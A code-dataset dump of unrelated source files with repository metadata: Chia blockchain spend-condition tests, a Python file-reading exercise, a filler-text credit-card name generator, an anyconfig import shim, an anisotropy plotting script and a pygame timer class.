assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_HEIGHT_ABSOLUTE_FAILED
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
res, _, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
# At index 11, it can be spent
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_height_relative(self, two_nodes):
num_blocks = 11
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent after index 11
# This condition requires block1 coinbase to be spent more than 10 block after it was farmed
# block index has to be greater than (2 + 9 = 11)
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_HEIGHT_RELATIVE, [int_to_bytes(9)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent too early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block at index 11
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_HEIGHT_RELATIVE_FAILED
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
res, _, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
# At index 12, it can be spent
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_seconds_relative(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent 300 seconds after coin creation
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_SECONDS_RELATIVE, [int_to_bytes(300)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent to early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
time_per_block=20,
guarantee_transaction_block=True,
)
# Try to validate that block before 300 sec
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_SECONDS_RELATIVE_FAILED
valid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
time_per_block=301,
)
res, err, _ = await full_node_1.blockchain.receive_block(valid_new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_seconds_absolute(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent after 30 seconds from now
current_time_plus3 = uint64(blocks[-1].foliage_transaction_block.timestamp + 30)
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_SECONDS_ABSOLUTE, [int_to_bytes(current_time_plus3)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent to early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
time_per_block=20,
guarantee_transaction_block=True,
)
# Try to validate that block before 30 sec
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_SECONDS_ABSOLUTE_FAILED
valid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
time_per_block=31,
)
res, err, _ = await full_node_1.blockchain.receive_block(valid_new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_fee_condition(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires fee to be 10 mojo
cvp_fee = ConditionWithArgs(ConditionOpcode.RESERVE_FEE, [int_to_bytes(10)])
# This spend bundle has 9 mojo as fee
block1_dic_bad = {cvp_fee.opcode: [cvp_fee]}
block1_dic_good = {cvp_fee.opcode: [cvp_fee]}
block1_spend_bundle_bad = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic_bad, fee=9
)
block1_spend_bundle_good = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic_good, fee=10
)
log.warning(block1_spend_bundle_good.additions())
log.warning(f"Spend bundle fees: {block1_spend_bundle_good.fees()}")
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle_bad,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.RESERVE_FEE_CONDITION_FAILED
valid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle_good,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(valid_new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
| [
"[email protected]"
] | |
fe08790f0a1ce9cb7efb4031c9bbf11adbbfcec9 | 6efdee46507c2f2d05e4986c963f189a1e754e9b | /ex15.py | 048204e2129b9aea9b9230e4d635d3eca03a682d | [] | no_license | SachinPitale/Python | b0d2d08f6f12bdce8a30ba9e9c370d3415721168 | 6889527b4b04e394feedcd6516e0298cccb6c5ee | refs/heads/master | 2020-07-26T05:59:46.325528 | 2019-09-15T07:26:24 | 2019-09-15T07:26:24 | 208,557,473 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py |
from sys import argv
script, filename = argv
txt = open(filename)
print "Here's your file %r :" %filename
print txt.read()
print "type the file name again "
file_again = raw_input("> ")
txt_again = open(file_again)
print txt_again.read()
| [
"[email protected]"
] | |
689f182aaf2c3e12e5345b5f4029c3a84a26d873 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_unshakeable.py | e5580220c428d26267e79c308054751c325bd982 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 464 | py |
#calss header
class _UNSHAKEABLE():
def __init__(self,):
self.name = "UNSHAKEABLE"
self.definitions = [u"If someone's trust or belief is unshakeable, it is firm and cannot be made weaker or destroyed: "]
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"[email protected]"
] | |
1fb2df762dd45f6aa9845f161da2ee0c3e55bf03 | 77f5a8d34aadc697e95671f1c9b17ca547e2b4c1 | /xierpa3/contributions/filibuster/content/creditcard.py | 3038f19db04632a24c976e6344a1a4cf9dd30217 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | dungmv56/Xierpa3 | ef9f37a62a5b739e6e41f8bbe683820771a2f22e | 1e5fecaee84204401f3cc7ccea10092cb31029bf | refs/heads/master | 2020-12-24T11:17:31.945821 | 2016-02-25T11:39:08 | 2016-02-25T11:39:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,697 | py | # -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
# Contributed by Erik van Blokland and Jonathan Hoefler
# Original from filibuster.
#
# FILIBUSTER.ORG!
"""
living
--------------------------------------------------------------------
"""
__version__ = '3.0.0'
__author__ = "someone"
content = {
'creditcard': [
'<#p_cc_flavor#><#p_cc_sx#>',
'<#p_cc_flavor#><#p_cc_flavor#><#p_cc_sx#>',
'<#p_cc_quality#> <#p_cc_flavor#><#p_cc_sx#>',
'<#p_cc_quality#> <#p_cc_flavor#><#p_cc_sx#>',
],
'creditcard_accepted': [
'<#company#> welcomes <#creditcard#>',
'<#company#> prefers <#creditcard#>',
'We welcome <#creditcard#>',
'We prefer <#creditcard#>',
'<#creditcard#> preferred!',
'<#creditcard#> accepted.',
'Pay with <#creditcard#>',
],
'creditcard_issued': [
'<#p_cc_issuer#> <#creditcard#>',
u'<#p_cc_issuer#>’s <#creditcard#>',
'<#creditcard#>, by <#p_cc_issuer#>',
],
'creditcard_number': [
'<#figs#><#figs#><#figs#><#figs#> <#figs#><#figs#><#figs#><#figs#> <#figs#><#figs#><#figs#><#figs#> <#figs#><#figs#><#figs#><#figs#>',
],
'creditcard_validuntil': [
'<#time_months#> <#time_comingyears#>',
],
'p_acronym': [
'<#alphabet_caps#><#alphabet_caps#>',
'<#alphabet_caps#><#alphabet_caps#><#alphabet_caps#>',
],
'p_cc_flavor': [
'<#p_cc_flavor_common#>',
'<#p_cc_flavor_nonsense#>',
'<#name_japanese#>',
'<#p_cc_flavor_religious#>',
'<#p_cc_flavor_super#>',
'<#p_cc_flavor_count#>',
'<#p_cc_flavor_sweet#>',
'<#p_cc_flavor_shop#>',
'<#p_cc_flavor_money#>',
'<#p_cc_flavor_modern#>',
'<#p_cc_flavor_currency#>',
'<#p_cc_flavor_locale#>',
'<#p_cc_flavor_odd#>',
'<#p_cc_flavor_others#>',
],
'p_cc_flavor_common': [
'Direct',
'Media',
'Uni',
'Family',
'Member',
'Diner',
],
'p_cc_flavor_count': [
'Twin',
'Bi',
'Duo',
'Tri',
'Trio',
'Quatro',
'Penta',
],
'p_cc_flavor_currency': [
'Dime',
'<#sci_transition_metals#>Dollar',
'Dollar',
'Sterling',
'Change',
],
'p_cc_flavor_locale': [
'Euro',
'Asia',
'US',
'HK',
],
'p_cc_flavor_modern': [
'Com',
'Phone',
'Smart',
'Swipe',
'Compu',
'Terminal',
'Electro',
'Plasti',
'Chem',
'Chemi',
'Chemo',
'Net',
'Web',
'SET',
'Inter',
],
'p_cc_flavor_money': [
'Buy',
'Cash',
'Kash',
'Money',
'Pecunia',
'Debet',
'Debt',
'Specu',
'Pin',
'Chipper',
],
'p_cc_flavor_nonsense': [
'Exi',
'Minto',
'Exo',
'Mondo',
'Fina',
],
'p_cc_flavor_odd': [
'Gas',
'Petro',
'Petroli',
],
'p_cc_flavor_others': [
'<#p_acronym#>',
'<#p_co_creative#>',
'<#p_co_mediaprefix#>',
'<#p_business_name#>',
'<#p_cc_quality#>',
],
'p_cc_flavor_religious': [
'Pure',
'Reli',
'Holy',
'Spiri',
'God',
'Noble',
],
'p_cc_flavor_shop': [
'Excel',
'Access',
'XS',
'Fast',
'Digi',
'E',
'Shop',
'Store',
'Market',
],
'p_cc_flavor_super': [
'Super',
'Hyper',
'Ultra',
'Kid',
'Major',
'Minor',
],
'p_cc_flavor_sweet': [
'Courtesy',
'Polite',
'Nice',
'Comfort',
'Friendly',
'Friendli',
],
'p_cc_issuer': [
'<#company#>',
'<#eurobank#>',
'<#usbank#>',
'<#name_japanese#>',
],
'p_cc_quality': [
'Personal',
'Home',
'Business',
'Corporate',
'<#sci_popularelements#>',
'<#sci_popularelements#>',
'<#sci_popularelements#>',
'<#sci_popularelements#>',
],
'p_cc_sx': [
'Card',
'Card',
'Card',
'Card',
'Credit',
'Express',
],
}
| [
"[email protected]"
] | |
de8214dd5f2792bdca5eccdda107e72222c30130 | 58115fa94a81b02a8b194fe7f1c1cd4ff996df97 | /src/anyconfig/schema/__init__.py | 1437437066cf8b3c7b6580abe489d66ce4816ad7 | [
"MIT"
] | permissive | Terrance-forks/python-anyconfig | 9f77de334c162e1c2334a749c29f63bd0294a09b | 21d7c0e30287569b394972557b5a54fab03bcd5c | refs/heads/master | 2021-06-19T09:11:18.697637 | 2021-05-17T04:35:10 | 2021-05-17T04:35:10 | 202,930,334 | 0 | 0 | MIT | 2019-08-17T20:52:23 | 2019-08-17T20:52:22 | null | UTF-8 | Python | false | false | 451 | py | #
# Copyright (C) 2021 Satoru SATOH <[email protected]>
# SPDX-License-Identifier: MIT
#
r"""misc global constants, variables, classes and so on.
"""
try:
from .jsonschema import validate, is_valid, gen_schema
SUPPORTED: bool = True
except ImportError:
from .default import validate, is_valid, gen_schema
SUPPORTED = False # type: ignore
__all__ = [
'validate', 'is_valid', 'gen_schema', 'SUPPORTED'
]
# vim:sw=4:ts=4:et:
| [
"[email protected]"
] | |
89018a833caf16c361c788be55349a65e85782d1 | 30e58b930c31526a1e226a928bc77e23f232080e | /mapfunctions/plotMaker.py | e04deb5fbb17956d5e7c3e0ca08b53359a0972c8 | [] | no_license | bbw7561135/anisotropy | c8688f9d705234c6a90f607acb3e8cc28ea5be28 | a21f85788c16d8aa14fc5934f476def4c8954f34 | refs/heads/master | 2021-06-01T05:35:48.727845 | 2016-05-13T00:27:37 | 2016-05-13T00:27:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,679 | py | #!/usr/bin/env python
import subprocess, glob, math, os, argparse
import myGlobals as my
from anisotropy.icesim.analysis import readDist as readDist_IC
from anisotropy.topsim.analysis import readDist as readDist_IT
from anisotropy.mapfunctions.energyCuts import getEbins, getEnergyMaps
def medianLabel(config, emin, emax):
if config[:2] == 'IC':
median, sigL, sigR = readDist_IC(config, emin, emax)
if config[:2] == 'IT':
median, sigL, sigR = readDist_IT(config, emin, emax)
median = 10**(9+median)
median = round(median, -int(math.floor(math.log10(median))) + 1)
if median >= 1e15:
return '%.1fPeV' % (median / 1e15)
if median >= 1e12:
if median >= 1e13:
return '%iTeV' % (median / 1e12)
return '%.1fTeV' % (median / 1e12)
if __name__ == "__main__":
# Global variables setup for path names
my.setupAnisotropy(verbose=False)
mapPrefix = my.ani_maps
p = argparse.ArgumentParser(
description='Makes all plots for anisotropy paper')
p.add_argument('-b', '--batch', dest='batch',
default=False, action='store_true',
help='Option to not show interactive plots')
p.add_argument('--largesmall', dest='largesmall',
default=False, action='store_true',
help='Large and small scale structure maps for IceCube')
p.add_argument('--unsmoothed', dest='unsmoothed',
default=False, action='store_true',
help='Unsmoothed relative intensity map')
p.add_argument('--ic59', dest='ic59',
default=False, action='store_true',
help='IC59 20deg smoothed map for comparison')
p.add_argument('--it', dest='it',
default=False, action='store_true',
help='IceTop relint & sig maps')
p.add_argument('--square', dest='square',
default=False, action='store_true',
help='Square subset maps for comparison of small-scale features')
p.add_argument('--ebins', dest='ebins',
default=False, action='store_true',
help='IceCube maps binned in energy')
p.add_argument('--polar', dest='polar',
default=False, action='store_true',
help='IceCube maps binned in energy (polar view)')
p.add_argument('--powerspec', dest='powerspec',
default=False, action='store_true',
help='Power spectrum plot')
p.add_argument('--solar', dest='solar',
default=False, action='store_true',
help='Solar dipole maps')
p.add_argument('--dipole', dest='dipole',
default=False, action='store_true',
help='Plot dipole phase as a function of energy')
p.add_argument('--minima', dest='minima',
default=False, action='store_true',
help='Plot phase of absolute minimum as a function of energy')
p.add_argument('--reco', dest='reco',
default=False, action='store_true',
help='Plot table used for IC energy reconstructions')
p.add_argument('--edist', dest='edist',
default=False, action='store_true',
help='Plot true energy distributions for reco energy bins')
p.add_argument('--edist2', dest='edist2',
default=False, action='store_true',
help='Plot true energy distributions for reco energy bins')
p.add_argument('--proj', dest='proj',
default=False, action='store_true',
help='Plot 1D projection for sid + solar')
p.add_argument('--projerr', dest='projerr',
default=False, action='store_true',
help='Plot 1D projection for anti + ext')
p.add_argument('--projcomp', dest='projcomp',
default=False, action='store_true',
help='Plot 1D projection for each year')
p.add_argument('--smallscale', dest='smallscale',
default=False, action='store_true',
help='Relative intensity for each small-scale region over time')
p.add_argument('--all', dest='all',
default=False, action='store_true',
help='Make all plots')
args = p.parse_args()
opts = vars(args)
if args.all:
opts = {key:True for key in opts}
argList = []
outDir = '/home/jbourbeau/anisotropy/paperplots/'
if not os.path.isdir(outDir):
outDir = '/home/jbourbeau/'
ext = 'png'
batch = args.batch
##=========================================================================
## Skymaps
cmd = '{}/mapfunctions/plotFITS.py'.format(my.ani_home)
defArgs = '-o --mask --outDir {} --ext {}'.format(outDir, ext)
if batch:
defArgs += ' -b'
# Large- and small-scale structure
mapFile = mapPrefix + '/IC_24H_sid.fits'
#a = [mapFile+' -n relint -S 5 -s 3 -m -1.5 -M 1.5 --half']
a = [mapFile+' -n relint -S 5 -s 3 -m -1.5 -M 1.5 --half --gplane']
a += [mapFile+' -n relint -S 5 -s 4 -m -5 -M 5 --multi 2 --half --gplane']
#a += [mapFile+' -n signal -S 5 -m -45 -M 30 --half']
#a += [mapFile+' -n signal -S 5 -m -9 -M 9 --multi 2 --half']
a += [mapFile+' -n signal -S 5 -m -45 -M 45 --half --gplane']
a += [mapFile+' -n signal -S 5 -m -12 -M 12 --multi 2 --half --gplane']
if opts['largesmall']:
argList += a
# Unsmoothed relative intensity
mapFile = mapPrefix + '/IC_24H_sid.fits'
a = ['-f '+mapFile+' -n relint -s 3 --half -m -2 -M 2']
a += ['--customOut IC_relint_unsmoothed']
if opts['unsmoothed']:
argList += a
# IC59 map
mapFile = mapPrefix + '/IC59_24H_sid.fits'
a = ['-f '+mapFile+' -n relint -S 20 -s 4 -m -2 -M 2 --multi 2 --half']
if opts['ic59']:
argList += a
# IceTop maps
mapFile = mapPrefix + '/IT_24H_sid_STA8.fits'
#a = [mapFile+' -n relint -S 20 -s 3 -m -3 -M 3']
#a += [mapFile+' -n signal -S 20 -m -9 -M 9']
label = medianLabel('IT', 8, 100)
a = '%s -n relint -S 20 -s 3 -m -3 -M 3 --llabel %s' % (mapFile, label)
a += ' --rlabel IceTop --half'
if opts['it']:
argList += [a]
# Anisotropy as a function of energy
a = []
eBins = getEbins()
eMins, eMaxs = eBins[:-1], eBins[1:]
mapFiles = getEnergyMaps('IC')
for i, f in enumerate(mapFiles):
mapFile = ' '.join(f)
label = medianLabel('IC', eMins[i], eMaxs[i])
tempArgs = '%s -n relint -S 20 -s 3 --llabel %s' % (mapFile, label)
tempArgs += ' --half'
minmax = 3 if float(eMins[i]) >= 6.5 else 1
tempArgs += ' -m -%i -M %i' % (minmax, minmax)
# Custom naming for merged file
if len(f) > 1:
tempArgs += ' --customOut IC_24H_sid_5pt5-6GeV_relint_20deg'
a += [tempArgs]
if opts['ebins']:
argList += a
# Polar plots
a = []
for i, f in enumerate(mapFiles):
mapFile = ' '.join(f)
label = medianLabel('IC', eMins[i], eMaxs[i])
tempArgs = '%s -n relint -S 20 -s 3 --polar' % mapFile
tempArgs += ' --llabel %s' % label
minmax = 3 if float(eMins[i]) >= 6.5 else 1
tempArgs += ' -m -%i -M %i' % (minmax, minmax)
if len(f) > 1:
tempArgs += ' --customOut IC_24H_sid_5pt5-6GeV_relint_20deg_polar'
a += [tempArgs]
label = medianLabel('IT', 8, 100)
mapFile = '%s/IT_24H_sid_STA8.fits' % mapPrefix
a += ['%s -n relint -S 20 -s 3 -m -3 -M 3 --polar --llabel %s --rlabel %s' % \
(mapFile, label, 'IceTop')]
if opts['polar']:
argList += a
# Solar dipole
mapFile = mapPrefix + '/IC_24H_solar.fits'
a = [mapFile+' -n relint -S 20 -s 4 -m -3 -M 3 --half']
a += [mapFile+' -n signal -S 20 -m -33 -M 33 --half']
mapFile = mapPrefix + '/IT_24H_solar_NotSTA8.fits'
mapFile += ' %s/IT_24H_solar_STA8.fits' % mapPrefix
newArg = mapFile+' -n relint -S 20 -s 4 -m -3 -M 3 --half'
newArg += ' --customOut IT_24H_solar_relint'
a += [newArg]
newArg = mapFile+' -n signal -S 20 -m -3.5 -M 3.5 --half'
newArg += ' --customOut IT_24H_solar_signal'
a += [newArg]
if opts['solar']:
argList += a
# Apply default arguments and plot command function
argList = ['{} {} {}'.format(cmd, a, defArgs) for a in argList]
for a in argList:
a = a.split(' ')
proc = subprocess.Popen(a)
##=========================================================================
## Other plots
# Square comparison maps
if opts['square']:
cmd = '%s/mapFunctions/plotFITS.py' % my.ani_home
mapFile = mapPrefix + '/IC_24H_sid.fits'
a = '%s %s -n signal -S 5 -m -12 -M 12 --multi 2' % (cmd, mapFile)
a += ' --ramin -90 --ramax 0 --decmin -80 --decmax -35'
a += ' -o --mask --outDir %s --ext %s' % (outDir, ext)
a += ' --customOut IC_24H_square'
if batch:
a += ' -b'
proc = subprocess.Popen(a.split(' '))
# Recreate IC59 original map
b = a.replace('IC_', 'IC59_')
b = b.replace('-S 5', '-S 20')
proc = subprocess.Popen(b.split(' '))
# Power spectrum
out = outDir + 'IC_Power_Spectrum.' + ext
if opts['powerspec']:
mapFile = '%s/maps/merged/IC_24H_sid.fits' % my.ani_data
cmd = 'python %s/polspice/spice.py' % my.ani_home
a = '%s %s -a 1 -A 130 -t 140 --multi 2 -o %s' % (cmd, mapFile, out)
#a += ' --nofull'
a = a.split(' ')
if batch:
a += ['-b']
proc = subprocess.Popen(a)
# Dipole phase
#out = outDir + 'IC_Dipole_Phase.' + ext
#if opts['dipole']:
# from anisotropy.mapFunctions.dipolePlot import energyPlot
# offset = 90
# energyPlot(offset=offset, out=out, batch=batch)
#out = outDir + 'IC_Minimum_Phase.' + ext
#if opts['minima']:
# from anisotropy.mapFunctions.dipolePlot import minimumPlot
# offset=90
# minimumPlot(offset=offset, out=out, batch=batch)
if opts['dipole']:
out = '{}/IC_Dipole.{}'.format(outDir, ext)
cmd = 'python {}/mapfunctions/phasePlot.py'.format(my.ani_home)
a = '{} -f energy -l 3 -o {} --offset 90 -n 72'.format(cmd, out)
#a = '%s -f energy -l 4 -o %s --offset 90' % (cmd, out)
a = a.split(' ')
if batch:
a += ['-b']
proc = subprocess.Popen(a)
# Reconstructed energy table
config = 'IC59'
out = outDir + config+'_Median_Energy.' + ext
if opts['reco']:
from anisotropy.icesim.plots import reco_energy_plot
reco_energy_plot(config, out=out, batch=batch)
# Energy distribution plot
config = 'IC86'
out = outDir + config+'_Energy_Distributions.' + ext
if opts['edist']:
from anisotropy.icesim.plots import eres
eres(config, out=out, batch=batch)
config = 'IC59'
out = outDir + config+'_Energy_Dist2.' + ext
if opts['edist2']:
from anisotropy.icesim.plots import eres2
eres2(config, out=out, batch=batch)
# One-dimensional projection
out = outDir + 'IC_proj1d.' + ext
mapTypes = ['sid','solar']
#mapTypes = ['anti','ext']
if opts['proj']:
mapFiles = ['%s/IC_24H_%s.fits' % (mapPrefix, i) \
for i in mapTypes]
a = ['%s/mapFunctions/proj1d.py' % my.ani_home]
a += mapFiles
a += ['-z','-o',out,'--syserr','--labels','method']
#a += ['-z','-o',out]
if batch:
a += ['-b']
proc = subprocess.Popen(a)
# One-dimensional projection
out = outDir + 'IC_proj1d_err.' + ext
mapTypes = ['anti','ext']
if opts['projerr']:
mapFiles = ['%s/IC_24H_%s.fits' % (mapPrefix, i) \
for i in mapTypes]
a = ['%s/mapFunctions/proj1d.py' % my.ani_home]
a += mapFiles
a += ['-z','-o',out,'--labels','method']
if batch:
a += ['-b']
proc = subprocess.Popen(a)
# One-dimensional projection for each year
if opts['projcomp']:
cmd = '%s/mapFunctions/proj1d.py' % my.ani_home
configs = ['IC59','IC79','IC86','IC86-II','IC86-III','IC86-IV']
files = ['%s/%s_24H_sid.fits' % (mapPrefix, cfg) for cfg in configs]
files = ' '.join(files)
out = outDir + 'IC_proj1d_comp.' + ext
a = '%s %s -z -o %s --syserr --labels configs' % (cmd, files, out)
if batch:
a += ' -b'
proc = subprocess.Popen(a.split(' '))
if opts['smallscale']:
cmd = 'python %s/mapFunctions/testsmall.py' % my.ani_home
out = outDir + 'IC_SmallScale.' + ext
a = '%s --paper -o %s' % (cmd, out)
if batch:
a += ' -b'
proc = subprocess.Popen(a.split(' '))
| [
"[email protected]"
] | |
98730ea9cabba62f347e29709bcad21695798feb | b6dce5523115d7e51ce1c5bf11ca963f9a17f04c | /shift/utils/timer.py | 4be249aeb97ad182f8bf6179f4a88b92a227a55e | [
"MIT"
] | permissive | fyabc/Py2016 | 1fcb345df6bcd89348686e13337158aa4325a8e0 | a7e2b4ad11c96be97107821defef379d6e6f7595 | refs/heads/master | 2020-12-29T02:37:17.580568 | 2017-02-27T16:18:02 | 2017-02-27T16:18:02 | 54,388,415 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,084 | py | # -*- coding: utf-8 -*-
__author__ = 'fyabc'
import pygame
import time
class ShiftTimer:
"""The Timer of this game. Copied from pgu.timer.
This is a singleton class. Do NOT have two ShiftTimer object at the same time.
"""
# The game time when one of the clock parameters was last changed
lastGameTime = None
# The real time corresponding to the last game time
lastRealTime = None
# The game time when 'tick' was last called
lastTickTime = None
# Whether the timer is paused or not
paused = False
# When this clock was created
startTime = None
# The speed which this clock moves at relative to the real clock
speed = 1
def __init__(self):
self.lastGameTime = 0
self.lastTickTime = 0
self.lastRealTime = time.time()
self.startTime = time.time()
# Set the rate at which this clock ticks relative to the real clock
def set_speed(self, n):
assert (n >= 0)
self.lastGameTime = self.getTime()
self.lastRealTime = time.time()
self.speed = n
# Pause the clock
def pause(self):
if not self.paused:
self.lastGameTime = self.getTime()
self.lastRealTime = time.time()
self.paused = True
# Resume the clock
def resume(self):
if self.paused:
self.paused = False
self.lastRealTime = time.time()
def tick(self, fps=0):
tm = self.getTime()
dt = tm - self.lastTickTime
if fps > 0:
minTime = 1.0 / fps
if dt < minTime:
pygame.time.wait(int((minTime - dt) * 1000))
dt = minTime
self.lastTickTime = tm
return dt
# Returns the amount of 'game time' that has passed since creating
# the clock (paused time does not count).
def getTime(self):
if self.paused:
return self.lastGameTime
return self.speed * (time.time() - self.lastRealTime) + self.lastGameTime
def getRealTime(self):
return time.time() - self.startTime
| [
"[email protected]"
] | |
